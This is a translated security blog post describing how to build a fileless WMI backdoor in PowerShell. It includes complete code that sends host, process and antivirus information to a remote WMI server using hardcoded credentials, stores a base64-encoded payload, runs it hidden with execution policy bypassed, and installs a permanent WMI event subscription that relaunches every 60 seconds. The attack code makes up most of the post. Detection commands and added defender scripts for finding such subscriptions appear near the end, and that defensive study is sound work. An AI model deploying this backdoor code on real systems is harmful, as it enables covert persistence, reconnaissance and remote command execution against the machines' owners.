WMI Backdoor
0x00 Preface
The previous article covered how to carry out WMI attacks with PowerShell. This one continues with a more advanced WMI technique: the WMI backdoor.
The figure shows "How threat actors use WMI to maintain persistence" from Mandiant's M-Trends 2015 report (the covert scheduled launch described in the previous article).
0x01 Overview
Design a WMI backdoor using the basics from the previous WMI attacks article.
Characteristics:
Leaves no files on either the Client or the Server
Does not modify the registry
Implemented with PowerShell only
0x02 Test environment
CLIENT:
192.168.40.208
Win8x86
SERVER:
192.168.40.206
Win7x64
Username:a
Password:testtest
0x03 Approach
Because this is a backdoor, stealth comes first.
The Client needs to provide the following functions:
Upload information to the server
Fetch commands and execute them
Launch on a schedule
0x04 Implementation
1. The Client sends local host information to the Server
As noted in "WMI attacks - 3. Storing payloads", data can be stored in the WMI repository without leaving a separate file; on disk it actually lives inside a complex database (objects.data).
Design:
Client collects host configuration information - connects to the remote server - stores it on the remote server
Server reads the information
Implementation:
(1) Client collects host configuration information - connects to the remote server - stores it on the remote server
Client-side PowerShell code:
#Connect to 192.168.40.206
$Options = New-Object Management.ConnectionOptions
$Options.Username = 'a'
$Options.Password = 'testtest'
$Options.EnablePrivileges = $True
$Connection = New-Object Management.ManagementScope
$Connection.Path = '\\192.168.40.206\root\cimv2'
$Connection.Options = $Options
$Connection.Connect()
$EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
#Create the new class name
$EvilClass['__CLASS'] = 'Win32_UserInfo'
$EvilClass.Properties.Add('IP19216840208', [Management.CimType]::String, $False)
#Collect host configuration information
$GetOS=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
$GetProcess=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process
$GetService=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service -Filter "State='Running'"
$GetUser=Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
$GetAV=Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
#Note: the newline character in PowerShell is `n
$EvilClass.Properties['IP19216840208'].Value = $GetUser.UserName+"`n"+"OS:"+$GetOS.Caption+";"+$GetOS.OSArchitecture+"`n"+"AntiVirusProduct:"+ $GetAV.displayName+"`n"+"Process:"+"`n"+$GetProcess.Name+"`n"+"Service Start:"+"`n"+$GetService.Name
#Store it
$EvilClass.Put()
As shown in the figure.
(2) The Server runs a query to retrieve the host information
([WmiClass] 'Win32_UserInfo').Properties['IP19216840208']
As shown in the figure.
2. The Client fetches commands and executes them
Design:
Client stores the command in encoded form
Client reads the command - decodes it - executes it
Implementation:
(1) Client stores the command in encoded form
Client-side PowerShell code:
#Define the payload; a single-quoted here-string (@'...'@) is required so that the variables inside are kept literally instead of being expanded
$Payload=@'
$Options = New-Object Management.ConnectionOptions
$Options.Username = 'a'
$Options.Password = 'testtest'
$Options.EnablePrivileges = $True
$Connection = New-Object Management.ManagementScope
$Connection.Path = '\\192.168.40.206\root\cimv2'
$Connection.Options = $Options
$Connection.Connect()
$EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)
$EvilClass['__CLASS'] = 'Win32_CommandTest'
$EvilClass.Properties.Add('IP19216840208', [Management.CimType]::String, $False)
$EvilClass.Properties['IP19216840208'].Value ="Run Command Test!"
$EvilClass.Put()
'@
#Base64-encode the payload
$bytes = [System.Text.Encoding]::Unicode.GetBytes($Payload);
$EncodedPayload = [System.Convert]::ToBase64String($bytes);
#Store the encoded payload
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)
$StaticClass.Name = 'Win32_Command'
$StaticClass.Put()
$StaticClass.Properties.Add('EnCommand' , $EncodedPayload)
$StaticClass.Put()
As shown in the figure.
(2) View the encoded payload
([WmiClass] 'Win32_Command').Properties['EnCommand']
As shown in the figure.
(3) Client reads the command - decodes it - executes it
#Read the encoded payload
$EncodedPayload=([WmiClass] 'Win32_Command').Properties['EnCommand'].Value
#Execute the command with PowerShell
$PowerShellPayload = "powershell -ep bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -enc $EncodedPayload"
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $PowerShellPayload
#Show the decoded command
$bytes2 = [System.Convert]::FromBase64String($EncodedPayload);
$decoded = [System.Text.Encoding]::Unicode.GetString($bytes2);
"decoded Payload:"
$decoded
As shown in the figure.
On the Server, run:
([WmiClass] 'Win32_CommandTest').Properties['IP19216840208']
to verify whether it succeeded.
As shown in the figure.
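As a defender-side counterpart to the storage technique in sections 1 and 2 above, here is an added PowerShell check (not from the original post) that lists static classes in root\cimv2 whose properties carry a stored default value, decoding any long base64 run for triage. It assumes it is run elevated on the host under inspection; the Get-StaticClassData function name is mine.

```powershell
# Added example (not from the original post): enumerate static classes in root\cimv2 whose
# properties carry a stored default value, which is where Win32_UserInfo and Win32_Command
# above keep their data. Assumption: run elevated on the host under inspection.
function Get-StaticClassData {
    param([string]$Namespace = 'root\cimv2')
    $b64Pattern = '^[A-Za-z0-9+/]{40,}={0,2}$'   # a long base64 run, e.g. a -enc payload
    foreach ($class in (Get-WmiObject -Namespace $Namespace -List)) {
        # Provider-backed ('dynamic') classes get their values from a provider at query
        # time; data written with ManagementClass.Put() lives in the repository instead.
        if ($class.Qualifiers | Where-Object { $_.Name -eq 'dynamic' }) { continue }
        foreach ($prop in $class.Properties) {
            if ($prop.Type -ne 'String' -or [string]::IsNullOrEmpty($prop.Value)) { continue }
            $value   = [string]$prop.Value
            $decoded = $null
            if ($value -match $b64Pattern) {
                # -enc payloads are UTF-16LE; decode only for triage, never run them.
                try   { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($value)) }
                catch { $decoded = '<not valid base64>' }
            }
            [pscustomobject]@{
                Class    = $class.Name
                Property = $prop.Name
                Length   = $value.Length
                Preview  = $value.Substring(0, [Math]::Min(60, $value.Length))
                Decoded  = $decoded
            }
        }
    }
}

# Every hit is a class with data baked into its schema; the names Win32_UserInfo and
# Win32_Command do not exist in a stock Windows install.
Get-StaticClassData | Format-List
```

Compare the output against a clean reference host of the same build, since a handful of legitimate classes may also carry string defaults.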
3. The Client runs the PowerShell command on a schedule
#Read the encoded command
$EncodedPayload=([WmiClass] 'Win32_Command').Properties['EnCommand'].Value
$filterName = 'BotFilter56'
$consumerName = 'BotConsumer56'
#Create an __EventFilter that sets the trigger condition: fire once every 60 s
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
#Create a CommandLineEventConsumer that sets the action to run
$Arg =@{
Name=$consumerName
CommandLineTemplate="C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -enc $EncodedPayload"
}
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments $Arg
#Bind the filter to the consumer
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
As shown in the figure.
0x05 Supplement
Further notes on the scheduled launch function
1. EventFilter
Can be understood as the trigger condition, expressed as a WQL query; the query types are:
(1) Data queries
SELECT * FROM Win32_NTLogEvent WHERE Logfile = 'Application'
(2) Event queries
SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Service' AND TargetInstance.__CLASS = 'win32_TerminalService'
(3) Schema queries
SELECT * FROM meta_class WHERE __this ISA "Win32_BaseService"
2. Consumer
Can be understood as the action taken once the condition is met; the standard consumers are:
(1)ActiveScriptEventConsumer
(2)LogFileEventConsumer
(3)NTEventLogEventConsumer
(4)SMTPEventConsumer
(5)CommandLineEventConsumer
3. Two ways to run a VBS script with a consumer
(1) Run an existing script file directly
instance of ActiveScriptEventConsumer as $Cons
{
Name = "ASEC";
ScriptingEngine = "VBScript";
ScriptFileName = "c:\\asec2.vbs";
};
(2) Embedded script, which leaves no file behind
instance of ActiveScriptEventConsumer as $Cons
{
Name = "ASEC";
ScriptingEngine = "VBScript";
ScriptText =
"Dim objFS, objFile\n"
"Set objFS = CreateObject(\"Scripting.FileSystemObject\")\n"
"Set objFile = objFS.OpenTextFile(\"C:\\ASEC.log\","
" 8, true)\nobjFile.WriteLine \"Time: \" & Now & \";"
" Entry made by: ASEC\"\nobjFile.WriteLine"
" \"Application closed. UserModeTime: \" & "
"TargetEvent.TargetInstance.UserModeTime &_\n"
"\"; KernelModeTime: \" & "
"TargetEvent.TargetInstance.KernelModeTime "
"& \" [hundreds of nanoseconds]\"\n"
"objFile.Close\n";
};
References:
https://msdn.microsoft.com/en-us/library/aa392902(v=vs.85).aspx
https://msdn.microsoft.com/en-us/library/aa393250(v=vs.85).aspx
0x06 Summary
This article only introduces advanced WMI attack techniques; do not use it for illegal purposes.
Once again, the methods for detecting WMI persistence:
#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
Check the event logs:
– Microsoft-Windows-WinRM/Operational
– Microsoft-Windows-WMI-Activity/Operational
– Microsoft-Windows-DistributedCOM
Or even disable the Winmgmt service to block this technique entirely.
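Going one step beyond the three listing commands above, here is an added PowerShell script (not part of the original post) that joins each binding to its filter and consumer and flags the patterns this post uses: a polling WITHIN filter, a PowerShell command line, an -enc payload (decoded for triage) and inline ScriptText. It assumes it runs elevated on the host being inspected and only reports, leaving removal to the analyst.

```powershell
# Added example (not from the original post): resolve every permanent WMI event subscription
# on the local host and flag the patterns described in this post. Assumption: run elevated.
$ns = 'root\subscription'

# Index filters and consumers by name so each binding resolves without further queries.
$filters = @{}
Get-WmiObject -Namespace $ns -Class __EventFilter   | ForEach-Object { $filters[$_.Name] = $_ }
$consumers = @{}
Get-WmiObject -Namespace $ns -Class __EventConsumer | ForEach-Object { $consumers["$($_.__CLASS)|$($_.Name)"] = $_ }

# A binding stores references such as  __EventFilter.Name="BotFilter56"  (possibly with a
# leading \\host\namespace: prefix); extract the class and Name from them.
$refPattern = '(?<class>\w+)\.Name="(?<name>[^"]+)"'

foreach ($b in (Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding)) {
    $f = if ($b.Filter   -match $refPattern) { $filters[$Matches.name] }
    $c = if ($b.Consumer -match $refPattern) { $consumers["$($Matches.class)|$($Matches.name)"] }
    $reasons = @()
    $decoded = $null

    # Polling filters (WITHIN n) are the timer this post uses; real event filters rarely need them.
    if ($f -and $f.Query -match '__Instance\w+Event\s+WITHIN') { $reasons += 'polling event filter' }

    if ($c.__CLASS -eq 'CommandLineEventConsumer') {
        $cmd = $c.CommandLineTemplate
        if ($cmd -match 'powershell') { $reasons += 'PowerShell in CommandLineTemplate' }
        # -enc / -EncodedCommand carries UTF-16LE base64; decode it for triage only.
        if ($cmd -match '-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)') {
            try   { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
            catch { $decoded = '<not valid base64>' }
            $reasons += 'encoded command'
        }
    } elseif ($c.__CLASS -eq 'ActiveScriptEventConsumer' -and $c.ScriptText) {
        $reasons += 'inline ScriptText (no script file on disk)'
    }

    [pscustomobject]@{
        Filter   = $b.Filter
        Query    = $f.Query
        Consumer = $b.Consumer
        Flags    = ($reasons -join '; ')
        Decoded  = $decoded
    }
}
```

Anything with a non-empty Flags column deserves a look; a binding whose filter or consumer fails to resolve is also worth noting, since it is either broken or partially cleaned up.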
This article is original work by 三好學生 and was first published on WooYun Drops; please credit the source when reposting.